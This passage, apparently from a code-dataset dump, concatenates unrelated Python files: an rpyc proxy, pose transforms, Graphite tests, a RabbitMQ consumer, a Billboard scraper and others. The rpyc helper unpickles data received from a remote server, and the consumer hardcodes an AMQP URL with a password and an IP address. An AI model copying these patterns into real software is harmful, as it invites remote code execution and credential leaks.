getattr(proxy_connection.root, func_name)(arglist)\n data = pickle.loads(data)\n return data\n\ndef pickle_and_call(func_name, *args):\n global proxy_connection\n global _mark\n\n # when was the last time we queried the server?\n if (datetime.datetime.now() - _mark) > _reloadtimeout:\n # print \"Reloading due to timeout\"\n proxy_connection=rpyc.connect(PROXY_SERVER, 18866)\n\n _mark = datetime.datetime.now()\n\n return pickle_and_call_helper(func_name, *args)\n\nFUNC_NAMES = 'itemQuery query saveItem saveProp saveSeries'.split()\nFUNC_NAMES.append('block_itemQuery')\n\nfor name in FUNC_NAMES:\n locals()[name] = functools.partial(pickle_and_call, name)\n","sub_path":"research/utils/timescape_proxy_uat.py","file_name":"timescape_proxy_uat.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"291858867","text":"import numpy as np\n\n\ndef world_to_camera(poses_world, cam_par):\n \"\"\"\n Rotate/translate 3d poses from world to camera viewpoint\n \n Args\n poses_world: array of poses in world coordinates of size n_frames x n_dimensions\n cam_par: dictionary of camera parameters\n \n Returns\n poses_cam: poses in camera-centred coordinates\n \"\"\"\n \n if 'vis' in cam_par.keys():\n ids = [i for i in cam_par['vis'].astype(bool) for j in range(3)]\n poses_world = poses_world[:,ids]\n \n ndim = poses_world.shape[1]\n poses_world = np.reshape(poses_world, [-1, 3])\n \n assert len(poses_world.shape) == 2\n assert poses_world.shape[1] == 3\n \n poses_cam = np.matmul(cam_par['R'], poses_world.T).T + cam_par['tvec']\n poses_cam = np.reshape( poses_cam, [-1, ndim] )\n \n return poses_cam\n\n\ndef camera_to_world( poses_cam, cam_par ):\n \"\"\"\n Rotate/translate 3d poses from camera to world\n \n Args\n poses_cam: poses in camera coordinates\n cam_par: dictionary with camera parameters\n \n Returns\n poses_world: poses in world coordinates\n \"\"\"\n\n ndim = poses_cam.shape[1]\n \n poses_world = np.reshape(poses_cam, [-1, 3]).copy()\n poses_world -= cam_par['tvec']\n poses_world = np.matmul(np.linalg.inv(cam_par['R']), poses_world.T).T\n poses_world = np.reshape( poses_world, [-1, ndim] )\n \n return poses_world\n\n\ndef project_to_camera(poses, intr):\n \"\"\"\n Project poses to camera frame\n \n Args\n poses: poses in camera coordinates\n intr: intrinsic camera matrix\n \n Returns\n poses_proj: 2D poses projected to camera plane\n \"\"\"\n \n ndim = poses.shape[1]\n poses = np.reshape(poses, [-1, 3]) \n poses_proj = np.squeeze(np.matmul(intr, poses[:,:,np.newaxis]))\n poses_proj = poses_proj / poses_proj[:, [2]]\n poses_proj = poses_proj[:, :2]\n poses_proj = np.reshape( poses_proj, [-1, int(ndim/3*2)] )\n \n return poses_proj\n\n\ndef XY_coord(poses):\n \"\"\"\n Project 3d poses to XY plane\n \n Args\n poses: poses\n \n Returns\n poses_xy: poses projected to xy plane \n \"\"\"\n poses_xy = {}\n\n for key in poses.keys():\n t3d = poses[ key ]\n\n ndim = t3d.shape[1]\n XY = np.reshape(t3d, [-1, 3])\n XY = XY[:,:2]\n poses_xy[ key ] = np.reshape( XY, [-1, ndim//3*2] )\n \n return poses_xy\n\n\ndef Z_coord( poses):\n \"\"\"\n Project 3d poses to XY plane\n \n Args\n poses: poses\n \n Returns\n poses_xy: poses projected to xy plane \n \"\"\"\n \n poses_z = {}\n for key in poses.keys():\n t3d = poses[ key ]\n\n ndim = t3d.shape[1]\n Z = np.reshape(t3d, [-1, 3])\n Z = Z[:,2]\n poses_z[ key ] = np.reshape( Z, [-1, ndim//3] )\n\n return poses_z","sub_path":"examples/fly_tether/src/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":2837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"248966485","text":"import os\nfrom boto3.dynamodb.conditions import Key\n\n\nclass TestsEsUtil:\n @classmethod\n def delete_alias(cls, elastic_search, alias_name):\n if elastic_search.indices.exists_alias(alias_name):\n indices = elastic_search.indices.get_alias(alias_name)\n\n for index in indices:\n elastic_search.indices.delete_alias(index, alias_name)\n elastic_search.indices.delete(index)\n\n @staticmethod\n def create_articles_index(elasticsearch):\n TestsEsUtil.remove_articles_index(elasticsearch)\n\n article_settings = {\n 'mappings': {\n 'article': {\n 'properties': {\n 'sort_key': {\n 'type': 'long'\n }\n }\n }\n }\n }\n elasticsearch.indices.create(index='articles', body=article_settings)\n\n @staticmethod\n def remove_articles_index(elasticsearch):\n elasticsearch.indices.delete(index='articles', ignore=[404])\n\n @staticmethod\n def sync_public_articles_from_dynamodb(dynamodb, elasticsearch):\n table = dynamodb.Table(os.environ['ARTICLE_INFO_TABLE_NAME'])\n query_params = {\n 'IndexName': 'status-sort_key-index',\n 'KeyConditionExpression': Key('status').eq('public')\n }\n articles = table.query(**query_params)\n for article in articles['Items']:\n elasticsearch.index(\n index='articles',\n doc_type='article',\n id=article['article_id'],\n body=article\n )\n elasticsearch.indices.refresh(index='articles')\n","sub_path":"tests/tests_common/tests_es_util.py","file_name":"tests_es_util.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"2709169","text":"# -*- coding: utf-8 -*-\n\nfrom copy import deepcopy\n\nfrom aioresponses import aioresponses\nfrom asynctest._fail_on import fail_on\nfrom asynctest.case import TestCase\nfrom asynctest.mock import patch, call\nfrom ddt import data, ddt, unpack\nfrom freezegun.api import freeze_time\n\nfrom alamo_common.test.utils import override_settings\nfrom alamo_worker.plugins.graphite import GraphitePlugin, GraphiteResult\nfrom alamo_worker.plugins.mixins import RESULT_UNKNOWN\nfrom alamo_worker.plugins.tests import make_graphite_response\n\nDUMMY_GRAPHITE_HOST = 'dummy.endpoint'\nDUMMY_RENDER_ENDPOINT = 'http://%s/render' % DUMMY_GRAPHITE_HOST\n\nCHECK = {\n \"id\": 1914,\n \"uuid\": 'some-uuid-1234',\n \"name\": \"Sample check\",\n \"description\": \"\",\n \"frequency\": \"300\",\n \"sources\": [{\n \"metric\": \"stats.tech.fake.*.metric\",\n 'name': 'graphite',\n 'type': 'graphite',\n }],\n \"triggers\": [\n {\n \"id\": 999,\n \"url\": \"http://example.com/\"\n \"#/999/entity/888/check/1914/?triggerId=999\",\n 'rule': 'graphite.values > 2 OR graphite.num_series < 2',\n\n \"enabled\": True,\n \"debounce\": \"0\",\n \"severity\": \"WARNING\",\n }\n ],\n \"tags\": [],\n \"integration_key\": \"5c70b0ec4c024dc6b64224xxxxx17df6\",\n \"environment\": \"test\",\n \"entity_id\": \"888\",\n \"entity_name\": \"testing\",\n \"service_id\": \"999\",\n \"service_name\": \"pl.allegro.transaction.returns\"\n}\n\n\n@ddt\nclass TestGraphitePlugin(TestCase):\n use_default_loop = False\n\n async def setUp(self):\n super().setUp()\n self.graphite = GraphitePlugin()\n\n @unpack\n @data(\n (make_graphite_response([], metric='a'), 1, 0),\n (make_graphite_response([None, None], metric='b'), 1, 0),\n (make_graphite_response([1, 1], metric='a'), 1, 1),\n (make_graphite_response([1, None, None, None], metric='a'), 2, 0),\n (make_graphite_response([1, None, None], metric='a'), 2, 1),\n )\n @patch('alamo_worker.plugins.graphite.aiostats')\n @fail_on(unused_loop=False)\n def test_graphite_result_num_series(self, series, freq, expected, *args):\n result = GraphiteResult(\n 'test',\n self.graphite.collect_result(series, freq, 'test')\n )\n self.assertEqual(result.num_series, expected)\n\n @unpack\n @data(\n {\n 'payload': make_graphite_response([2, 1, 1, 14, None, None]),\n 'metric_calls': [call('graphite.series.test.valid_data')]\n },\n {\n 'payload': make_graphite_response([None] * 3),\n 'metric_calls': [call('graphite.series.test.missing_data'),\n call('graphite.fail.test.null_in_series')]\n },\n {\n 'payload': [],\n 'metric_calls': [call('graphite.fail.test.no_results')]\n },\n {\n 'payload': make_graphite_response([200] * 5),\n 'metric_calls': [],\n },\n )\n @aioresponses(param='m')\n @patch('alamo_worker.plugins.graphite.aiostats')\n async def test_faketest(self, stats_mock, payload, metric_calls, m):\n graphite_check = deepcopy(CHECK)\n m.get(DUMMY_RENDER_ENDPOINT, payload=payload)\n\n await self.graphite.execute(\n graphite_check, graphite_check['sources'][0]\n )\n\n stats_mock.increment.incr.assert_has_calls(metric_calls)\n\n @aioresponses()\n async def test_invalid_response(self, aiomock):\n graphite_check = deepcopy(CHECK)\n\n aiomock.get(\n DUMMY_RENDER_ENDPOINT,\n status=400,\n payload=make_graphite_response([2, 1, 2, 14, None, None])\n )\n\n result = await self.graphite.execute(\n graphite_check, graphite_check['sources'][0]\n )\n self.assertEqual(result.name, 'graphite')\n\n self.assertEqual(result.status, RESULT_UNKNOWN)\n\n @aioresponses()\n async def test_add_meta(self, aiomock):\n self.maxDiff = None\n href = (\n DUMMY_RENDER_ENDPOINT +\n '?width=800'\n '&height=480'\n '&tz=Europe%2FWarsaw'\n '&from=11%3A12_20160101'\n '&until=12%3A12_20160101'\n '&target=stats.tech.fake.%2A.metric'\n '&target=threshold%280.0%2C+%22threshold+%3D+0.0%22%2C+red%29'\n )\n expected = [('graphite_url', 'link', href)]\n aiomock.get(\n DUMMY_RENDER_ENDPOINT,\n payload=make_graphite_response([2, 1, 2, 14, None, None])\n )\n check = deepcopy(CHECK)\n\n result = await self.graphite.execute(\n check, check['sources'][0]\n )\n with override_settings(GRAPHITE_RENDER_URL=DUMMY_RENDER_ENDPOINT):\n with freeze_time(\"2016-01-01 12:12:12\"):\n meta = result.build_meta()\n self.assertListEqual(meta, expected)\n\n @fail_on(unused_loop=False)\n def test_supported_types(self):\n self.assertListEqual(self.graphite.supported_types(), ['graphite'])\n\n @patch('alamo_worker.plugins.graphite.aiostats')\n @fail_on(unused_loop=False)\n def test_collect_result(self, mock_stats):\n graphite_data = [\n make_graphite_response([None] * 7, metric='bunny.a')[0],\n make_graphite_response(\n [None, None, 1, 3, None, 2, None] * 7, metric='bunny.b'\n )[0],\n ]\n plugin = GraphitePlugin()\n result = plugin.collect_result(graphite_data, 3, 'dev')\n expected = {'bunny.a': [], 'bunny.b': [3, 2]}\n self.assertEqual(result, expected)\n\n @aioresponses()\n async def test_health_check__healthy(self, aiomock):\n aiomock.get(DUMMY_RENDER_ENDPOINT, status=200)\n result = await self.graphite.healthy()\n self.assertEqual(result, ('graphite', True))\n\n @aioresponses()\n async def test_health_check__not_healthy(self, aiomock):\n aiomock.get(DUMMY_RENDER_ENDPOINT, status=500)\n result = await self.graphite.healthy()\n self.assertEqual(result, ('graphite', False))\n","sub_path":"alamo_worker/plugins/tests/test_graphite_plugin.py","file_name":"test_graphite_plugin.py","file_ext":"py","file_size_in_byte":6034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"226089922","text":"time = 0 \nanswer = \"\" \nwhile answer != \"Mississippi\": \n print(\"What has 4 eyes but cannot see? \") \n print(\"Please entre the answer here:\") \n answer = input() \n time+=1 \n if answer == \"Mississippi\":\n if time <= 3:\n print(\"Well done, you solved my riddle within three guesses!Number of total times: %d times\"%(time)) \n else:\n print(\"Well down!You solve this riddle!Number of total times: %d times\"%(time))\n else:\n print(\"Number of %s times: %d times\"%('error',time)) \n","sub_path":"Riddle_Task/riddles_task3_MrF.py","file_name":"riddles_task3_MrF.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"646293068","text":"import webbrowser\n\n\n# Media Class\nclass Media():\n\n \"\"\" The class Media contains the Basic Information about the media.\n Information like Title for the movie or tv series.\n The class also contains the method to show the media trailer.\n Attributes:\n mediaId: A reference Id,\n mediaType: TV or MOVIE,\n title: Title of the media,\n duration: Duration of the movie.\n In case or TV show the duration of the episodes,\n pgrating: The pg rating for the the movie or the tv show,\n cast: The case for this media,\n poster: The poster image url for the media,\n trailerurl:The youtube trainer url,\n media_storyline: The story line of the movie or the tv show,\n genres: The gerenes for the media\n viewer_rating: The rating information about he media\n \"\"\"\n\n def __init__(self, md_id, md_type, md_title, md_duration,\n md_pg_rating, md_cast, poster,\n md_trailer_url, media_storyline, media_genres):\n \"\"\"Constructor for class Media\n Attributes:\n md_id: A reference Id,\n md_type: TV or MOVIE,\n md_title: Title of the media,\n md_duration:Duration of the movie. In case of TV show\n the duration of the episodes,\n md_pg_rating: The pg rating for the the movie or the tv show,\n md_cast: The case for this media,\n poster: The poster image url for the media,\n md_trailer_url: The youtube trainer url,\n media_storyline:The story line of the movie or the tv show, and\n media_genres: The gerenes for the media\n \"\"\"\n self.media_id = md_id\n self.media_type = md_type\n self.title = md_title\n self.duration = md_duration\n self.pg_rating = md_pg_rating\n self.cast = md_cast\n self.poster_url = poster\n self.trailer_url = md_trailer_url\n self.story_line = media_storyline\n self.genres = media_genres\n self.viewer_rating = ViewerRating()\n\n def show_trailer(self):\n \"\"\"\n Opens the youtube trailer\n Arguments:\n None\n Returns:\n None\n \"\"\"\n webbrowser.open(self.trailer)\n\n\n# Rating class\nclass Rating():\n\n \"\"\"\n Individual rating class that containg the users review and ratings.\n Attribute:\n user_rating: A integer between 1 - 10\n user_review: A string containgin the users review\n user_name\n \"\"\"\n\n def __init__(self, usr_review=\"\", usr_rating=0, usr_name=\"\"):\n \"\"\"\n Constructor for the rating class\n Arguments:\n usr_review: A users review for the media\n usr_rating: A int between 1 - 10 for users rating for the media\n usr_name: A string user name\n \"\"\"\n self.user_rating = usr_rating\n self.user_review = usr_review\n self.user_name = usr_name\n\n\n# Viewer Ratings Class\nclass ViewerRating():\n\n \"\"\"\n ViewerRating the class containg the viewer ratings for any media\n Attributes:\n MAX_RATING: The maximum any media can be rated.\n current_rating: The current average rating.\n total_ratings: The total number of reviews or ratings present.\n current_revies: An array of te current reviews\n acerage_rating: The average rating for the media\n \"\"\"\n MAX_RATING = 10\n\n def __init__(self):\n temp_rating = Rating()\n self.current_reviews = [temp_rating]\n self.total_rating = len(self.current_reviews) - 1\n self.average_rating = 0\n self.adjust_ratings()\n\n def add_rating(self, rating, review, username):\n \"\"\"\"\n Adds the review and ratings for a a media\n Args:\n rating a number between 0 - 10\n review a string containing the review comments by the user\n username a string containing the user name who added the review\n Returns:\n The function rturns nothing. Will show error if\n the rating passed is not within\n the range appropreate error will be disaplayed\n \"\"\"\n # check and throw error if the rating is not in range\n if int(rating) < 0 or int(rating) > 10:\n print(\"Please Enter Rating Between [0 - 10]\")\n return\n else:\n new_rating = Rating(review, rating, username)\n self.current_reviews.insert(0, new_rating)\n self.adjust_ratings()\n\n def adjust_ratings(self):\n \"\"\"\"\n adjusts the average raiting for this media\n Args:\n none\n Returns:\n nothing\n \"\"\"\n self.total_rating = len(self.current_reviews)\n if self.total_rating == 0:\n self.average_rating = 0\n return\n rating_sum = 0\n for iReview in self.current_reviews:\n # Continue the loop and add the ratings\n rating_sum = rating_sum + iReview.user_rating\n # calculate and set average rating\n if self.total_rating == 1:\n self.average_rating = rating_sum / self.total_rating\n else:\n self.average_rating = rating_sum / (self.total_rating-1)\n\n\n# The Movie Class\nclass Movie(Media):\n\n \"\"\"\n The class Movies that inherites Media class and represents\n a media type of movie\n Attributes:\n director: the name of the director of the movie\n releaseTear: the year whne the movie was released\n \"\"\"\n\n def __init__(self, md_id=1, media_title=\"\", media_duration=\"0\",\n media_pgrating=\"G\", media_cast=\"\", media_poster=\"\",\n media_trailerurl=\"\", media_storyline=\"\", media_genres=\"\",\n media_director=\"\", media_released=1900):\n Media.__init__(self, md_id, \"MOVIE\", media_title,\n media_duration, media_pgrating, media_cast,\n media_poster, media_trailerurl, media_storyline,\n media_genres)\n self.director = media_director\n self.releaseYear = media_released\n\n def addmediarating(self, rating, review, username):\n \"\"\"\n addmediarating setter method for the parent Media class\n set a rating to the viewer_rating property\n Arguments:\n rating: rating given by te user\n review: review comments by the user\n username: user name of the reviewer\n \"\"\"\n self.viewer_rating.add_rating(rating, review, username)\n\n\n# TV Show Class\nclass TVShow(Media):\n\n \"\"\"\n The class TVShow that inherites Media class anf represents a media type\n of TV show.\n Attributes:\n creator: The name of the director of the movie\n episodes: The number of episodes that the TV show has.\n no_of_seasons The number of season for the\n \"\"\"\n\n def __init__(self, md_id=1, media_title=\"\", media_duration=\"0\",\n media_pgrating=\"G\", media_cast=\"\", media_poster=\"\",\n media_trailerurl=\"\", media_storyline=\"\", media_genres=\"\",\n media_creator=\"\", media_aired=\"1990\", no_episodes=0,\n no_seasons=1):\n Media.__init__(self, md_id, \"TVSHOW\", media_title, media_duration,\n media_pgrating, media_cast, media_poster,\n media_trailerurl, media_storyline, media_genres)\n self.first_aired = media_aired\n self.creator = media_creator\n self.episodes = no_episodes\n self.no_of_seasons = no_seasons\n\n def addmediarating(self, rating, review, username):\n \"\"\"\n addmediarating setter method for the parent Media class\n set a rating to the viewer_rating property\n Arguments:\n rating: rating given by te user\n review: review comments by the user\n username: user name of the reviewer\n \"\"\"\n self.viewer_rating.add_rating(rating, review, username)\n","sub_path":"src/MovieLib.py","file_name":"MovieLib.py","file_ext":"py","file_size_in_byte":8154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"527014792","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport heapq\nimport random\n\ndef creat_city(num, scale):\n \"\"\"\n input:\n num: 城市数量\n scale: 城市坐标范围x,y in (0, scale)\n return:\n V:城市的坐标集合\n E:城市的邻接矩阵\n \"\"\"\n x = np.random.choice(scale, num)\n y = np.random.choice(scale, num)\n\n V = np.stack((x, y), axis=1)\n inner = -2 * V.dot(V.T)\n xx = np.sum(V ** 2, axis=1, keepdims=True)\n E = xx + inner + xx.T\n E = E ** 0.5\n index = [i for i in range(num)]\n # 为了防止蚂蚁出现自旋,邻接矩阵上的对角线取值尽量大一点。\n E[index, index] = 9999999\n return V, E\n\ndef a_res(samples, m):\n \"\"\"\n :samples: [(item, weight), ...]\n :k: number of selected items\n :returns: [(item, weight), ...]\n \"\"\"\n #根据概率选择下一个要去的城市\n\n heap = [] # [(new_weight, item), ...]\n for sample in samples:\n wi = sample[1]\n if wi==0:\n continue\n ui = random.uniform(0, 1)\n ki = ui ** (1/wi)\n\n if len(heap) < m:\n heapq.heappush(heap, (ki, sample))\n elif ki > heap[0][0]:\n heapq.heappush(heap, (ki, sample))\n\n if len(heap) > m:\n heapq.heappop(heap)\n\n return [item[1] for item in heap]\n\n\ndef possibility(eta, gamma, other_city, cur_city):\n \"\"\"\n 返回候选城市集合中,从start到各候选城市的概率,只返回有路径的\n \"\"\"\n alpha = 1\n beta = 5\n start_city = cur_city[-1]\n\n t_i = gamma[start_city]#从startcity到各点的信息素浓度\n n_i = eta[start_city]#从startcity到各点的启发值\n\n temp = t_i ** alpha * n_i ** beta\n temp[cur_city] = 0\n add = temp.sum()\n p_ij = temp / add\n\n return p_ij\n\ndef rotate(l, n):\n '''\n 旋转列表。\n '''\n return l[n:] + l[:n]\n\ndef get_path_dis(root, E):\n \"\"\"\n 获取该路径距离。\n \"\"\"\n dis = E[root[:-1], root[1:]].sum()\n return dis + E[root[0],root[-1]]\n\ndef ACS(V, E, M, num):\n \"\"\"\n Ant system\n V : 点集\n E: 邻接矩阵,点之间的连接性,\n M: 蚂蚁数量\n num:迭代次数\n \"\"\"\n # 相关参数\n global_best_path = None # 当前最优路径\n global_best_dis = 99999999\n cur_city = None\n other_city = [i for i in range(len(V))]\n lo = 0.5 # 信息素挥发率\n\n # 信息素启发值\n eta = 1 / E\n eta[np.isinf(eta)] = 0\n\n # 信息素浓度\n E_mean = E[E > 0].mean()\n gamma = np.full(E.shape, 1 / len(V))\n\n V_index = [i for i in range(len(V))]\n\n for i in range(num):\n epoch_gamma = np.zeros_like(gamma) # 保存每一轮的各路径信息素累积量\n local_best_path = None # 每一次迭代当前最优路径\n local_best_dis = 99999999\n for j in range(M):\n cur_city = [j % len(V)]#顺序分布蚂蚁\n other_city = [i for i in range(len(V))]\n other_city.remove(cur_city[-1])\n while other_city:\n p_ij = possibility(eta, gamma, other_city, cur_city)\n\n next_city = int(a_res(np.stack((V_index, p_ij), axis=1), 1)[0][0])\n\n epoch_gamma[cur_city[-1], next_city] += gamma[cur_city[-1], next_city]\n cur_city.append(next_city)\n other_city.remove(next_city)\n epoch_dis = get_path_dis(cur_city, E)\n if epoch_dis < local_best_dis:\n local_best_dis = epoch_dis\n local_best_path = cur_city\n\n if local_best_dis < global_best_dis:\n global_best_dis = local_best_dis\n global_best_path = local_best_path\n\n gamma = (1 - lo) * gamma + epoch_gamma\n\n best_path = rotate(global_best_path, global_best_path.index(0))\n\n return best_path","sub_path":"Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":3807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"324534357","text":"import json, billboard, time\nfrom pymongo import MongoClient\nfrom datetime import datetime\nimport pandas as pd\nimport numpy as np\n\n\ndef run(date=None, verbose=1):\n \"\"\"\n Collects all Billboard Hot 100 data starting from the given date and\n iterating through previous dates.\n\n Args: \n date: string in 'YYYY-MM-DD' format to start at.\n verbose: 0 or 1, with 1 meaning more status messages will be printed.\n\n Returns: nothing. Puts the gathered data in a mongo DB named billboard and \n with collection name hot100.\n\n \"\"\"\n\n # initialize DB connection\n collection = MongoClient()[\"billboard\"][\"hot100\"]\n\n # initialize arguments and extend timeout\n kwargs = {\"name\": \"hot-100\", \"max_retries\": 5, \"timeout\": 120}\n if not date:\n date = billboard.ChartData(**kwargs).date\n\n while date:\n kwargs[\"date\"] = date\n\n # get billboard data through billboard.py\n chart = billboard.ChartData(**kwargs)\n\n # prep chart data for mongo\n weekdata = json.loads(chart.json())\n weekdata[\"_id\"] = weekdata[\"date\"]\n weekdata[\"scraped\"] = datetime.utcnow()\n\n # insert into mongo\n collection.insert_one(weekdata)\n\n if verbose:\n print(date)\n\n date = chart.previousDate\n time.sleep(2)\n\n\ndef clean():\n \"\"\"\n Cleans raw data from the billboard scraper and puts it in \n billboard.hot100filtered. Mostly simplifies the data to one row per \n artist-track combination with the highest position on the chart and the \n most number of weeks. \n\n Args: None\n\n Returns: None. Does leave the cleaned data in billboard.hot100filtered.\n \"\"\"\n\n # initialize db connections\n db = MongoClient().billboard\n hot100filtered = db[\"hot100filtered\"]\n hot100raw = db.hot100\n\n # get raw data into a dataframe\n df = pd.DataFrame(hot100raw.find()).drop(\n columns=[\"_id\", \"_max_retries\", \"_timeout\", \"name\", \"nextDate\", \"title\"]\n )\n\n # unpacks each chart into an array of date-artist-track-etc rows\n alltracks = []\n for row in df.values:\n date = row[0]\n for track in row[1]:\n track[\"date\"] = date\n alltracks.append(track)\n\n df = pd.DataFrame(alltracks)\n\n # removes duplicate artist-track rows\n df = (\n df.groupby([\"artist\", \"title\"])\n .agg({\"date\": min, \"peakPos\": max, \"weeks\": max}, axis=\"columns\")\n .reset_index()\n )\n\n # inserts rows to db\n for i in range(df.shape[0]):\n entry = df.iloc[i].to_dict()\n entry[\"peakPos\"] = int(entry[\"peakPos\"])\n entry[\"weeks\"] = int(entry[\"weeks\"])\n\n hot100filtered.insert_one(entry)\n","sub_path":"src/billboard_scraper.py","file_name":"billboard_scraper.py","file_ext":"py","file_size_in_byte":2676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"639388397","text":"\"\"\"\n Convert json IDEA alerts to csv. Pass name of input file as argument.\n Input file should contain one IDEA alert per line.\n Output csv entries are printed to stdout.\n\"\"\"\n\nimport sys\nfrom SPMF.input.support.idea import Idea\n\n\ndef none_to_empty_str(o):\n return str(o) if o else \"\"\n\n\ndef process_line(line):\n idea = Idea(line)\n return \",\".join(map(none_to_empty_str,\n [idea.id,\n idea.aggr_id,\n idea.time,\n idea.category,\n idea.source,\n idea.src_proto,\n idea.target,\n idea.tar_proto,\n idea.port,\n idea.conn_count,\n idea.sensor]))\n\n\ndef main(argv=None):\n if argv is None:\n argv = sys.argv[1:]\n if len(argv) < 1:\n print(\"Missing arguments - input file name\", file=sys.stderr)\n return -1\n\n file_name = argv[1]\n\n # Load alerts\n with open(file_name, 'r') as file:\n for line in file:\n print(process_line(line))\n\n\nif __name__ == '__main__':\n status = main()\n sys.exit(status)\n","sub_path":"json/to_csv.py","file_name":"to_csv.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"97185341","text":"from kombu import Connection, Exchange, Queue, Consumer\nimport socket\nfrom datetime import datetime\nrabbit_url = \"amqp://user1:password1@134.221.121.65:5670/vhost1\" #proxy\nfrom kombu.log import get_logger\nfrom kombu.utils.debug import setup_logging\n\n\nlogger=get_logger(__name__)\nsetup_logging(loglevel=\"DEBUG\")\n\n\nconn = Connection(rabbit_url, heartbeat=10)\nexchange_adaas = Exchange(\"ex-adaas\", type=\"fanout\", durable=True)\nqueue_adaas_pri = Queue(\"q-adaas-pri\", exchange=exchange_adaas, durable=True)\n\ndef process_message(body, message):\n #print(str(datetime.now()) + \" The body is {}\".format(body))\n msg = str(datetime.now()) + \" {}\\n\".format(body)\n print(msg)\n with open(out_file, \"a+\") as text_file:\n text_file.write(msg)\n message.ack()\n if \"EOT\" in body:\n exit()\n\nconsumer = Consumer(conn, queues=queue_adaas_pri, callbacks=[process_message], accept=[\"text/plain\"])\n#consumer.consume()\n\ndef establish_connection():\n revived_connection = conn.clone()\n revived_connection.ensure_connection(max_retries=3)\n channel = revived_connection.channel()\n consumer.revive(channel)\n consumer.consume()\n return revived_connection\n\ndef consume():\n new_conn = establish_connection()\n while True:\n try:\n new_conn.drain_events(timeout=2)\n except socket.timeout:\n msg = str(datetime.now()) + \" checking heartbeat\\n\"\n with open(out_file, \"a+\") as text_file:\n text_file.write(msg)\n\n print(msg)\n new_conn.heartbeat_check()\ndef run():\n while True:\n try:\n consume()\n except conn.connection_errors:\n msg = str(datetime.now()) + \" connection error\\n\"\n with open(out_file, \"a+\") as text_file:\n text_file.write(msg)\n print(msg)\n\nout_file=\"/home/adaas/adaas_demo/q-pri\" + str(datetime.now()).replace(\" \",\"_\")\nrun()","sub_path":"adaas_consumer_pri.py","file_name":"adaas_consumer_pri.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"289368862","text":"import math\nimport time\n\n\ndef fibonacci(n):\n \"\"\"\n Calculates fibonacci sequence up until provided nth entry.\n :param n:\n :return:\n \"\"\"\n if n <= 2:\n return 1\n return fibonacci(n-1) + fibonacci(n-2)\n\n\ndef ackermann(m, n):\n if m == 0:\n return n + 1\n elif n == 0:\n return ackermann(m - 1, 1)\n else:\n return ackermann(m - 1, ackermann(m, n - 1))\n\n\ndef factorial(n):\n \"\"\"\n This is just a wrapper to ensure arg name compatibility with our forms, why reinvent the wheel?\n \"\"\"\n return math.factorial(n)\n\n\ndef time_func(f, *args, **kwargs):\n \"\"\"\n :param f: Input function\n :param args: args to pass to input function\n :param kwargs: kwargs to pass to input function\n :return: Execution time in ms and return from input function\n \"\"\"\n start = time.time()\n ret = f(*args, **kwargs)\n end = time.time()\n\n return (end - start) * 1000, ret\n","sub_path":"api/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"603337464","text":"from django.conf.urls import url, include\n\nfrom . import views\n\napp_name = \"api\"\nurlpatterns = [\n url(r\"^$\", views.index, name=\"index\"),\n url(r'^user', views.user, name=\"user\"),\n url(r'^website$', views.website, name=\"website\"),\n url(r'^rate$', views.rate, name=\"rate\"),\n url(r'^report$', views.report, name=\"report\"),\n url(r'^comment$', views.comment, name=\"comment\"),\n url(r'^like_comment$', views.like_comment, name=\"like_comment\"),\n url(r'^favourite$', views.favourite, name=\"favourite\"),\n url(r'^category$', views.category, name=\"category\")\n]\n","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"398428205","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nimport numpy as np\nimport cx_Oracle\nimport configparser\nimport sys\nimport os\nimport json\nimport shutil\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\ntf.logging.set_verbosity(tf.logging.ERROR)\n\nconfig = configparser.ConfigParser()\nmlroot = os.path.dirname(os.path.abspath(os.path.dirname(__file__)))\nconfig.read(mlroot + '\\\\config.ini')\n\nid = config['ORACLE']['ID']\npw = config['ORACLE']['PW']\nsid = config['ORACLE']['SID']\nip = config['ORACLE']['IP']\nport = config['ORACLE']['PORT']\n\nconnInfo = id + \"/\" + pw + \"@\" + ip + \":\" + port + \"/\" + sid\n\n#DB에서 training에 필요한 데이터 추출 후 가공\n#추후 모델에 새로운 데이터만 추가학습하는 로직 구축\nconn = cx_Oracle.connect(connInfo)\ncurs = conn.cursor()\nsql = \"SELECT SEQNUM, DATA, CLASS FROM TBL_FORM_MAPPING\"\ncurs.execute(sql)\nrows = curs.fetchall()\n\ndbData = []\ndbDataLabel = []\n\nfor row in rows:\n floatArr = []\n num = str(row[1]).split(\",\")\n for n in num:\n floatArr.append(float(n))\n\n dbData.append(floatArr)\n dbDataLabel.append(int(row[2]))\n\n\ntestNpData = np.array(dbData)\ntestNpTarget = np.array(dbDataLabel)\n\nfeature_columns = [tf.contrib.layers.real_valued_column(\"\", dimension=14)]\n\ncheckpointDir = mlroot + '\\\\FormMapping\\\\checkpoint'\n\nclassifier = tf.contrib.learn.DNNClassifier(feature_columns=feature_columns, 